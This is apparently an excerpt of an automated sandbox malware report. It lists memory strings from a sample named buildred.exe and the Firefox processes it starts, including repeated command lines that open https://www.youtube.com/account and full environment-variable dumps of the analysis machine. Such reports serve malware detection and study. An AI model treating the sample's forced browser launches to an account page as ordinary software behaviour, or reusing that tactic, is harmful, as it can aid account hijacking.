Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://pagead2.googlesyndication.com/gpt/pubads_impl_.js""https://www.amazon.com/exec/obidos/external-search/""://securepubads.g.doubleclick.net/gpt/pubads_impl_.js""://id.rambler.ru/rambler-id-helper/auth_events.js""://media.richrelevance.com/rrserver/js/1.2/p13n.js"FTP support was removed from Firefox in bug 1574475Please use $(ref:SecurityInfo.overridableErrorCategory)."://pagead2.googlesyndication.com/tag/js/gpt.js"An unexpected property was found in the WebExtension manifest."://track.adform.net/serving/scripts/trackpoint/" equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://www.facebook.com/platform/impression.php" equals www.facebook.com (Facebook)
Source: buildred.exe, 0000001A.00000002.2956306224.000000000854C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"_ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qN"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qN"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountt-]q equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qQ"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qQ"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"t-]q equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qxID: 5652, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]qxID: 7092, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q{ID: 7440, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2719579662.000001E53ADCB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2766918700.000001E53ADCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: '98p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://web-assets.toggl.com/app/assets/scripts/.jswebcompat-reporter%40mozilla.org:1.5.1://connect.facebook.net//sdk.jsresource://gre/modules/FileUtils.sys.mjs://www.rva311.com/static/js/main..chunk.js://connect.facebook.net//all.js://static.chartbeat.com/js/chartbeat.js://cdn.branch.io/branch-latest.min.js://www.googletagmanager.com/gtm.js://www.google-analytics.com/plugins/ua/ec.js://ssl.google-analytics.com/ga.js@mozilla.org/addons/addon-manager-startup;1://www.google-analytics.com/analytics.jsresource://gre/modules/addons/XPIProvider.jsm://s0.2mdn.net/instream/html5/ima3.js://libs.coremetrics.com/eluminate.js://imasdk.googleapis.com/js/sdkloader/ima3.js://.imgur.com/js/vendor..bundle.js://www.google-analytics.com/gtm/js://www.googletagservices.com/tag/js/gpt.js://.imgur.io/js/vendor..bundle.jsFileUtils_closeSafeFileOutputStream://c.amazon-adsystem.com/aax2/apstag.jshttps://smartblock.firefox.etp/play.svg://static.chartbeat.com/js/chartbeat_video.js://track.adform.net/serving/scripts/trackpoint/https://smartblock.firefox.etp/facebook.svg://www.everestjs.net/static/st.v3.js*://pub.doubleverify.com/signals/pub.jsFileUtils_closeAtomicFileOutputStream://auth.9c9media.ca/auth/main.js://static.criteo.net/js/ld/publishertag.jsFX_SESSION_RESTORE_ALL_FILES_CORRUPT equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2878323682.0000026181BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2927921411.0000026194B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2919430058.0000026193B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2888379941.000002618F03A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows"" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000003.2744972040.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows? equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2708137723.000001E539280000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2751984387.000001E539282000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsf equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.2855549826.00000130BDB54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2760124251.000001E539530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsfz equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevationN equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account< equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"winsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\DefaultH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JSON Viewer's onSave failed in startPersistenceFailed to listen. Callback argument missing.devtools.performance.popup.feature-flagdevtools/client/framework/devtools-browserdevtools.debugger.features.javascript-tracing{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Failed to execute WebChannel callback:No callback set for this channel.and deploy previews URLs are allowed.WebChannel/this._originCheckCallbackresource://devtools/shared/security/socket.js@mozilla.org/network/protocol;1?name=default@mozilla.org/network/protocol;1?name=file@mozilla.org/uriloader/handler-service;1browser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNamesdevtools-commandkey-javascript-tracing-toggleGot invalid request to save JSON datadevtools/client/framework/devtoolsreleaseDistinctSystemPrincipalLoaderUnable to start devtools server on devtools-commandkey-profiler-capture@mozilla.org/dom/slow-script-debug;1DevTools telemetry entry point failed: Failed to listen. Listener already attached.browser and that URL. Falling back to ^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$DevToolsStartup.jsm:handleDebuggerFlagdevtools.debugger.remote-websocketdevtools-commandkey-profiler-start-stopdevtools.performance.recording.ui-base-urlresource://devtools/server/devtools-server.jsgecko.handlerService.defaultHandlersVersionhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%shttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/DeferredTask.sys.mjs_injectDefaultProtocolHandlersIfNeededresource://gre/modules/FileUtils.sys.mjs^([a-z+.-]+:\/{0,3})([^\/@]+@).+^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?resource://gre/modules/NetUtil.sys.mjshttps://mail.yahoo.co.jp/compose/?To=%s{33d75835-722f-42c0-89cc-44f328e56a86}http://win.mail.ru/cgi-bin/sentmsg?mailto=%sbrowser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget 